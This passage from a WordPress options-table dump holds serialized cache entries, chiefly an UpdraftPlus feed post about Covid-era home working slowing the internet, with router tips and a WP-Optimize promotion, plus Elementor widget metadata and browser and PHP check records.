+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:8:{i:0;a:5:{s:4:\"data\";s:11:\"WP Optimize\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:5:\"covid\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:8:\"COVID-19\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:13:\"slow internet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:4;a:5:{s:4:\"data\";s:17:\"working from home\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:5;a:5:{s:4:\"data\";s:4:\"WP-O\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:6;a:5:{s:4:\"data\";s:11:\"WP-Optimise\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:7;a:5:{s:4:\"data\";s:11:\"WP-Optimize\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://updraftplus.com/?p=572025\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:868:\"<p>The current enforced working from home guidelines in place are in place in an attempt to slow the spread of Covid-19. They have now become a way of life for many, with a growing number of people in the UK &#8230; <a href=\"https://updraftplus.com/how-millions-working-from-home-has-slowed-the-internet-and-how-wp-optimize-is-working-hard-to-help/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/how-millions-working-from-home-has-slowed-the-internet-and-how-wp-optimize-is-working-hard-to-help/\">How millions working from home has slowed the internet and how WP-Optimize is working hard to help</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Wayne Mullins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:5962:\"<p><span style=\"font-weight: 400;\">The current enforced working from home guidelines in place are in place in an attempt to slow the spread of Covid-19. They have now become a way of life for many, with a growing number of people in the UK and around the world now using the internet to provide not just entertainment, but work and education also. This extra demand on bandwidth and associated infrastructure has caused problems for many and include the recent </span><a href=\"https://www.express.co.uk/life-style/science-technology/1274821/Virgin-Media-Offline-Outage-Internet-Down-Refund-Money-Back-Compensation\"><span style=\"font-weight: 400;\">Virgin internet outage</span></a><span style=\"font-weight: 400;\">, which left 43,00 users in the UK without an internet connection. Along with these outages, many internet users have also complained about the reduction in internet speeds that have seemed to have been put into effect to combat overuse. </span></p>\n<p><b>Why do you have a slow internet connection?</b></p>\n<p><span style=\"font-weight: 400;\">While the increase in the use of the internet by those homeschooling or binge watching Netflix accounts for the increase in demand, there may be some tips and tricks you can employ to help improve and hopefully speed up your internet connection. </span></p>\n<p><span style=\"font-weight: 400;\">The first thing to consider is the physical location of your internet server. If it is located too far away from your primary device, your home network connection could suffer due to potentially passing through many different devices before reaching your primary device. Also try to ensure that your router is as far away as possible from other devices, such as mobile phones, baby monitors, stereos, smart TVs and speakers, as these devices could interfere with the signal. </span></p>\n<p><span style=\"font-weight: 400;\">If it is not practical to move the router or bring your device closer, one way to help fix this would be to use a WiFi signal booster. A WiFi signal booster will extend your home network coverage by boosting or amplifying your router&#8217;s wireless internet signal. A WiFi signal booster can help to efficiently extend your wireless network, which will be of particular use if you have set-up a temporary office, such as in an attic or garden shed.</span></p>\n<p><b>Other options you can also try</b></p>\n<p><span style=\"font-weight: 400;\">It is also worth remembering that you should try rebooting your router occasionally as it can help clear specific malware (malicious software that has been designed to cause damage to your device or server) or use a wired ethernet connection directly with the router. </span></p>\n<p><span style=\"font-weight: 400;\">Also ensure that you regularly check your computer is updated with the latest antivirus software. While most antivirus protection programmes will carry out this task automatically, it is essential that you keep your computer’s protection up to date, which will help stop new threats slipping past your defences and potentially slowing your computer down.</span></p>\n<p><span style=\"font-weight: 400;\">In the UK, OFCOM have released a 7 point ‘</span><a href=\"https://www.ofcom.org.uk/phones-telecoms-and-internet/advice-for-consumers/stay-connected\"><span style=\"font-weight: 400;\">Stay connected during the coronavirus</span></a><span style=\"font-weight: 400;\">’ guide that further details everything you can do to help limit the strain on your internet. As well as moving your router clear of other devices, OFCOM also recommend that you use a landline when making calls if possible, turn off devices such as tablets and smartphones that you are not using (as they will often use WiFi in the background), try a wired ethernet cable to get better speeds, plug your router directly into your main phone socket and get advice from your broadband provider.   </span></p>\n<p><b>Making your site faster</b></p>\n<p><span style=\"font-weight: 400;\">With millions of extra people using and putting a strain on the internet every day, a scenario could arise where it is possible that your website’s users will experience periods where your site will be slow and unresponsive.</span></p>\n<p><span style=\"font-weight: 400;\">While we are unable to make the internet run faster, </span><a href=\"https://getwpo.com/\"><span style=\"font-weight: 400;\">WP-Optimize</span></a><span style=\"font-weight: 400;\"> has put in a lot of time and effort trying to do the next best thing. If you want your website to run faster and remain usable, installing WP-Optimize on your WordPress site is a great place to start. WP-Optimize is a revolutionary, all in one plugin that cleans your website’s database, compresses images (which slow loading speed) and caches your site. By improving your website’s performance, WP-Optimize can also help boost SEO, reduce visitor bounce rate and reduce server resources.</span></p>\n<p><span style=\"font-weight: 400;\">For further details on how to improve your website’s speed using WP-Optimize, be sure to check out </span><a href=\"https://updraftplus.com/how-to-increase-website-speed-with-wp-optimize-plugin/\"><span style=\"font-weight: 400;\">this blog</span></a><span style=\"font-weight: 400;\">. In this blog you will discover the best way to set-up and optimize the plugin. </span></p>\n<p><span style=\"font-weight: 400;\">If you have any questions or comments regarding WP-Optimize, please leave a message in the comment section below. </span></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/how-millions-working-from-home-has-slowed-the-internet-and-how-wp-optimize-is-working-hard-to-help/\">How millions working from home has slowed the internet and how WP-Optimize is working hard to help</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:123:\"https://updraftplus.com/how-millions-working-from-home-has-slowed-the-internet-and-how-wp-optimize-is-working-hard-to-help/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"\n	hourly	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"\n	1	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:2:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";s:4:\"href\";s:39:\"http://feeds.feedburner.com/UpdraftPlus\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:2:{s:3:\"rel\";s:3:\"hub\";s:4:\"href\";s:32:\"http://pubsubhubbub.appspot.com/\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:4:\"info\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:3:\"uri\";s:11:\"updraftplus\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:11:{s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:4:\"etag\";s:27:\"pUxrSGGOEkzPApBDaSMEGsduVZM\";s:13:\"last-modified\";s:29:\"Tue, 25 Aug 2020 11:56:31 GMT\";s:16:\"content-encoding\";s:4:\"gzip\";s:4:\"date\";s:29:\"Tue, 25 Aug 2020 12:19:10 GMT\";s:7:\"expires\";s:29:\"Tue, 25 Aug 2020 12:19:10 GMT\";s:13:\"cache-control\";s:18:\"private, max-age=0\";s:22:\"x-content-type-options\";s:7:\"nosniff\";s:16:\"x-xss-protection\";s:13:\"1; mode=block\";s:6:\"server\";s:3:\"GSE\";s:7:\"alt-svc\";s:192:\"h3-29=\":443\"; ma=2592000,h3-27=\":443\"; ma=2592000,h3-T050=\":443\"; ma=2592000,h3-Q050=\":443\"; ma=2592000,h3-Q046=\":443\"; ma=2592000,h3-Q043=\":443\"; ma=2592000,quic=\":443\"; ma=2592000; v=\"46,43\"\";}}s:5:\"build\";s:14:\"20200501235608\";}','no'),(61612,'_transient_timeout_feed_mod_e0061ca2fa5b884e483872aa34d3e7eb','1598401150','no'),(61613,'_transient_feed_mod_e0061ca2fa5b884e483872aa34d3e7eb','1598357950','no'),(61614,'_transient_timeout_updraftplus_dashboard_news','1598401150','no'),(61615,'_transient_updraftplus_dashboard_news','<div class=\"rss-widget\"><ul><li class=\"updraftplus_dashboard_news_item\"><a href=\"https://ashbyresort.com/wp-admin/\" class=\"dashicons dashicons-no-alt\" title=\"Dismiss all UpdraftPlus news\" onClick=\"updraftplus_dismiss_dashboard_news(); return false;\" style=\"float: right; box-shadow: none; margin-left: 5px;\"></a><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/UpdraftPlus/~3/iPALaoG6mcs/\'>UpdraftPlus: How to add Google Drive to your UpdraftPlus account settings</a></li><li class=\"updraftplus_dashboard_news_item\"><a href=\"https://ashbyresort.com/wp-admin/\" class=\"dashicons dashicons-no-alt\" title=\"Dismiss all UpdraftPlus news\" onClick=\"updraftplus_dismiss_dashboard_news(); return false;\" style=\"float: right; box-shadow: none; margin-left: 5px;\"></a><a class=\'rsswidget\' href=\'http://feedproxy.google.com/~r/UpdraftPlus/~3/346-jgo0dic/\'>UpdraftPlus: Easy Updates Manager and WordPress 5.5</a></li></ul></div>','no'),(61618,'_transient_is_multi_author','0','yes'),(61629,'_transient_vantage_categorized_blog_cache_count','1','yes'),(61662,'_transient_timeout_elementor_remote_info_api_data_2.9.14','1598862827','no'),(61663,'_transient_elementor_remote_info_api_data_2.9.14','a:4:{s:9:\"timestamp\";s:10:\"1598817425\";s:14:\"upgrade_notice\";a:3:{s:7:\"version\";s:5:\"2.0.0\";s:7:\"message\";s:0:\"\";s:11:\"update_link\";s:0:\"\";}s:11:\"pro_widgets\";a:59:{i:0;a:4:{s:4:\"name\";s:5:\"posts\";s:5:\"title\";s:5:\"Posts\";s:4:\"icon\";s:15:\"eicon-post-list\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:1;a:4:{s:4:\"name\";s:9:\"portfolio\";s:5:\"title\";s:9:\"Portfolio\";s:4:\"icon\";s:18:\"eicon-gallery-grid\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:2;a:4:{s:4:\"name\";s:7:\"gallery\";s:5:\"title\";s:7:\"Gallery\";s:4:\"icon\";s:23:\"eicon-gallery-justified\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:3;a:4:{s:4:\"name\";s:4:\"form\";s:5:\"title\";s:4:\"Form\";s:4:\"icon\";s:21:\"eicon-form-horizontal\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:4;a:4:{s:4:\"name\";s:5:\"login\";s:5:\"title\";s:5:\"Login\";s:4:\"icon\";s:15:\"eicon-lock-user\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:5;a:4:{s:4:\"name\";s:6:\"slides\";s:5:\"title\";s:6:\"Slides\";s:4:\"icon\";s:12:\"eicon-slides\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:6;a:4:{s:4:\"name\";s:8:\"nav-menu\";s:5:\"title\";s:8:\"Nav Menu\";s:4:\"icon\";s:14:\"eicon-nav-menu\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:7;a:4:{s:4:\"name\";s:17:\"animated-headline\";s:5:\"title\";s:17:\"Animated Headline\";s:4:\"icon\";s:23:\"eicon-animated-headline\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:8;a:4:{s:4:\"name\";s:10:\"price-list\";s:5:\"title\";s:10:\"Price List\";s:4:\"icon\";s:16:\"eicon-price-list\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:9;a:4:{s:4:\"name\";s:11:\"price-table\";s:5:\"title\";s:11:\"Price Table\";s:4:\"icon\";s:17:\"eicon-price-table\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:10;a:4:{s:4:\"name\";s:8:\"flip-box\";s:5:\"title\";s:8:\"Flip Box\";s:4:\"icon\";s:14:\"eicon-flip-box\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:11;a:4:{s:4:\"name\";s:14:\"call-to-action\";s:5:\"title\";s:14:\"Call to Action\";s:4:\"icon\";s:20:\"eicon-image-rollover\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:12;a:4:{s:4:\"name\";s:14:\"media-carousel\";s:5:\"title\";s:14:\"Media Carousel\";s:4:\"icon\";s:20:\"eicon-media-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:13;a:4:{s:4:\"name\";s:20:\"testimonial-carousel\";s:5:\"title\";s:20:\"Testimonial Carousel\";s:4:\"icon\";s:26:\"eicon-testimonial-carousel\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:14;a:4:{s:4:\"name\";s:7:\"reviews\";s:5:\"title\";s:7:\"Reviews\";s:4:\"icon\";s:12:\"eicon-review\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:15;a:4:{s:4:\"name\";s:17:\"table-of-contents\";s:5:\"title\";s:17:\"Table of Contents\";s:4:\"icon\";s:23:\"eicon-table-of-contents\";s:10:\"categories\";s:33:\"[\"pro-elements\",\"theme-elements\"]\";}i:16;a:4:{s:4:\"name\";s:9:\"countdown\";s:5:\"title\";s:9:\"Countdown\";s:4:\"icon\";s:15:\"eicon-countdown\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:17;a:4:{s:4:\"name\";s:13:\"share-buttons\";s:5:\"title\";s:13:\"Share Buttons\";s:4:\"icon\";s:11:\"eicon-share\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:18;a:4:{s:4:\"name\";s:11:\"search-form\";s:5:\"title\";s:11:\"Search Form\";s:4:\"icon\";s:17:\"eicon-site-search\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:19;a:4:{s:4:\"name\";s:10:\"author-box\";s:5:\"title\";s:10:\"Author Box\";s:4:\"icon\";s:12:\"eicon-person\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:20;a:4:{s:4:\"name\";s:13:\"post-comments\";s:5:\"title\";s:13:\"Post Comments\";s:4:\"icon\";s:14:\"eicon-comments\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:21;a:4:{s:4:\"name\";s:15:\"post-navigation\";s:5:\"title\";s:15:\"Post Navigation\";s:4:\"icon\";s:21:\"eicon-post-navigation\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:22;a:4:{s:4:\"name\";s:9:\"post-info\";s:5:\"title\";s:9:\"Post Info\";s:4:\"icon\";s:15:\"eicon-post-info\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:23;a:4:{s:4:\"name\";s:7:\"sitemap\";s:5:\"title\";s:7:\"Sitemap\";s:4:\"icon\";s:13:\"eicon-sitemap\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:24;a:4:{s:4:\"name\";s:11:\"breadcrumbs\";s:5:\"title\";s:11:\"Breadcrumbs\";s:4:\"icon\";s:11:\"eicon-yoast\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:25;a:4:{s:4:\"name\";s:10:\"blockquote\";s:5:\"title\";s:10:\"Blockquote\";s:4:\"icon\";s:16:\"eicon-blockquote\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:26;a:4:{s:4:\"name\";s:19:\"wc-archive-products\";s:5:\"title\";s:16:\"Archive Products\";s:4:\"icon\";s:14:\"eicon-products\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:27;a:4:{s:4:\"name\";s:31:\"woocommerce-archive-description\";s:5:\"title\";s:19:\"Archive Description\";s:4:\"icon\";s:25:\"eicon-product-description\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:28;a:4:{s:4:\"name\";s:20:\"woocommerce-products\";s:5:\"title\";s:8:\"Products\";s:4:\"icon\";s:14:\"eicon-products\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:29;a:4:{s:4:\"name\";s:22:\"woocommerce-breadcrumb\";s:5:\"title\";s:23:\"WooCommerce Breadcrumbs\";s:4:\"icon\";s:25:\"eicon-product-breadcrumbs\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:30;a:4:{s:4:\"name\";s:14:\"wc-add-to-cart\";s:5:\"title\";s:18:\"Custom Add To Cart\";s:4:\"icon\";s:17:\"eicon-woocommerce\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:31;a:4:{s:4:\"name\";s:11:\"wc-elements\";s:5:\"title\";s:17:\"WooCommerce Pages\";s:4:\"icon\";s:19:\"eicon-product-pages\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:32;a:4:{s:4:\"name\";s:13:\"wc-categories\";s:5:\"title\";s:18:\"Product Categories\";s:4:\"icon\";s:24:\"eicon-product-categories\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:33;a:4:{s:4:\"name\";s:21:\"woocommerce-menu-cart\";s:5:\"title\";s:9:\"Menu Cart\";s:4:\"icon\";s:10:\"eicon-cart\";s:10:\"categories\";s:41:\"[\"theme-elements\",\"woocommerce-elements\"]\";}i:34;a:4:{s:4:\"name\";s:25:\"woocommerce-product-title\";s:5:\"title\";s:13:\"Product Title\";s:4:\"icon\";s:19:\"eicon-product-title\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:35;a:4:{s:4:\"name\";s:26:\"woocommerce-product-images\";s:5:\"title\";s:14:\"Product Images\";s:4:\"icon\";s:20:\"eicon-product-images\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:36;a:4:{s:4:\"name\";s:25:\"woocommerce-product-price\";s:5:\"title\";s:13:\"Product Price\";s:4:\"icon\";s:19:\"eicon-product-price\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:37;a:4:{s:4:\"name\";s:31:\"woocommerce-product-add-to-cart\";s:5:\"title\";s:11:\"Add To Cart\";s:4:\"icon\";s:25:\"eicon-product-add-to-cart\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:38;a:4:{s:4:\"name\";s:26:\"woocommerce-product-rating\";s:5:\"title\";s:14:\"Product Rating\";s:4:\"icon\";s:20:\"eicon-product-rating\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:39;a:4:{s:4:\"name\";s:25:\"woocommerce-product-stock\";s:5:\"title\";s:13:\"Product Stock\";s:4:\"icon\";s:19:\"eicon-product-stock\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:40;a:4:{s:4:\"name\";s:24:\"woocommerce-product-meta\";s:5:\"title\";s:12:\"Product Meta\";s:4:\"icon\";s:18:\"eicon-product-meta\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:41;a:4:{s:4:\"name\";s:37:\"woocommerce-product-short-description\";s:5:\"title\";s:17:\"Short Description\";s:4:\"icon\";s:25:\"eicon-product-description\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:42;a:4:{s:4:\"name\";s:29:\"woocommerce-product-data-tabs\";s:5:\"title\";s:17:\"Product Data Tabs\";s:4:\"icon\";s:18:\"eicon-product-tabs\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:43;a:4:{s:4:\"name\";s:42:\"woocommerce-product-additional-information\";s:5:\"title\";s:22:\"Additional Information\";s:4:\"icon\";s:19:\" eicon-product-info\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:44;a:4:{s:4:\"name\";s:27:\"woocommerce-product-related\";s:5:\"title\";s:15:\"Product Related\";s:4:\"icon\";s:21:\"eicon-product-related\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:45;a:4:{s:4:\"name\";s:26:\"woocommerce-product-upsell\";s:5:\"title\";s:7:\"Upsells\";s:4:\"icon\";s:20:\"eicon-product-upsell\";s:10:\"categories\";s:24:\"[\"woocommerce-elements\"]\";}i:46;a:4:{s:4:\"name\";s:15:\"facebook-button\";s:5:\"title\";s:15:\"Facebook Button\";s:4:\"icon\";s:23:\"eicon-facebook-like-box\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:47;a:4:{s:4:\"name\";s:17:\"facebook-comments\";s:5:\"title\";s:17:\"Facebook Comments\";s:4:\"icon\";s:23:\"eicon-facebook-comments\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:48;a:4:{s:4:\"name\";s:14:\"facebook-embed\";s:5:\"title\";s:14:\"Facebook Embed\";s:4:\"icon\";s:14:\"eicon-fb-embed\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:49;a:4:{s:4:\"name\";s:13:\"facebook-page\";s:5:\"title\";s:13:\"Facebook Page\";s:4:\"icon\";s:13:\"eicon-fb-feed\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:50;a:4:{s:4:\"name\";s:8:\"template\";s:5:\"title\";s:8:\"Template\";s:4:\"icon\";s:19:\"eicon-document-file\";s:10:\"categories\";s:16:\"[\"pro-elements\"]\";}i:51;a:4:{s:4:\"name\";s:15:\"theme-site-logo\";s:5:\"title\";s:9:\"Site Logo\";s:4:\"icon\";s:15:\"eicon-site-logo\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:52;a:4:{s:4:\"name\";s:16:\"theme-site-title\";s:5:\"title\";s:10:\"Site Title\";s:4:\"icon\";s:16:\"eicon-site-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:53;a:4:{s:4:\"name\";s:16:\"theme-page-title\";s:5:\"title\";s:10:\"Page Title\";s:4:\"icon\";s:19:\"eicon-archive-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:54;a:4:{s:4:\"name\";s:16:\"theme-post-title\";s:5:\"title\";s:10:\"Post Title\";s:4:\"icon\";s:16:\"eicon-post-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:55;a:4:{s:4:\"name\";s:18:\"theme-post-excerpt\";s:5:\"title\";s:12:\"Post Excerpt\";s:4:\"icon\";s:18:\"eicon-post-excerpt\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:56;a:4:{s:4:\"name\";s:25:\"theme-post-featured-image\";s:5:\"title\";s:14:\"Featured Image\";s:4:\"icon\";s:20:\"eicon-featured-image\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:57;a:4:{s:4:\"name\";s:19:\"theme-archive-title\";s:5:\"title\";s:13:\"Archive Title\";s:4:\"icon\";s:19:\"eicon-archive-title\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}i:58;a:4:{s:4:\"name\";s:13:\"archive-posts\";s:5:\"title\";s:13:\"Archive Posts\";s:4:\"icon\";s:19:\"eicon-archive-posts\";s:10:\"categories\";s:18:\"[\"theme-elements\"]\";}}s:17:\"canary_deployment\";a:2:{s:11:\"plugin_info\";a:11:{s:2:\"id\";s:23:\"w.org/plugins/elementor\";s:4:\"slug\";s:9:\"elementor\";s:6:\"plugin\";s:23:\"elementor/elementor.php\";s:11:\"new_version\";s:5:\"3.0.0\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/plugin/elementor.3.0.0.zip\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/elementor/\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/elementor/assets/icon-256x256.png?rev=1427768\";s:2:\"1x\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";s:3:\"svg\";s:54:\"https://ps.w.org/elementor/assets/icon.svg?rev=1426809\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/elementor/assets/banner-1544x500.png?rev=1475479\";s:2:\"1x\";s:64:\"https://ps.w.org/elementor/assets/banner-772x250.png?rev=1475479\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.4\";s:12:\"requires_php\";s:3:\"5.6\";}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:3:{s:4:\"type\";s:8:\"language\";s:9:\"languages\";a:26:{i:0;s:5:\"he_IL\";i:1;s:5:\"en_GB\";i:2;s:5:\"en_NZ\";i:3;s:5:\"en_ZA\";i:4;s:5:\"en_AU\";i:5;s:5:\"en_CA\";i:6;s:5:\"sv_SE\";i:7;s:5:\"da_DK\";i:8;s:5:\"fr_FR\";i:9;s:5:\"nl_NL\";i:10;s:5:\"nb_NO\";i:11;s:5:\"de_AT\";i:12;s:2:\"fi\";i:13;s:5:\"it_IT\";i:14;s:5:\"nn_NO\";i:15;s:5:\"de_CH\";i:16;s:5:\"en_GB\";i:17;s:5:\"is_IS\";i:18;s:2:\"ga\";i:19;s:5:\"fr_BE\";i:20;s:5:\"nl_BE\";i:21;s:3:\"ast\";i:22;s:5:\"lb_LU\";i:23;s:5:\"es_ES\";i:24;s:5:\"pt_PT\";i:25;s:3:\"mlt\";}s:8:\"operator\";s:2:\"in\";}}}}}','no'),(61666,'_site_transient_timeout_browser_c27c60b23433e6b53a45ce1bff2ff371','1599424427','no'),(61667,'_site_transient_browser_c27c60b23433e6b53a45ce1bff2ff371','a:10:{s:4:\"name\";s:6:\"Chrome\";s:7:\"version\";s:13:\"84.0.4147.135\";s:8:\"platform\";s:9:\"Macintosh\";s:10:\"update_url\";s:29:\"https://www.google.com/chrome\";s:7:\"img_src\";s:43:\"http://s.w.org/images/browsers/chrome.png?1\";s:11:\"img_src_ssl\";s:44:\"https://s.w.org/images/browsers/chrome.png?1\";s:15:\"current_version\";s:2:\"18\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;s:6:\"mobile\";b:0;}','no'),(61668,'_site_transient_timeout_php_check_75e04be8322671c786117633c455e7a7','1599424427','no'),(61669,'_site_transient_php_check_75e04be8322671c786117633c455e7a7','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:0;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(61699,'elementor_install_history','a:4:{s:5:\"3.0.4\";i:1598819824;s:5:\"3.0.5\";i:1599096837;s:6:\"3.0.11\";i:1602338164;s:6:\"3.0.12\";i:1604081912;}','yes'),(61706,'_transient_timeout_rsssl_mixed_content_fixer_detected','1598820484','no'),(61707,'_transient_rsssl_mixed_content_fixer_detected','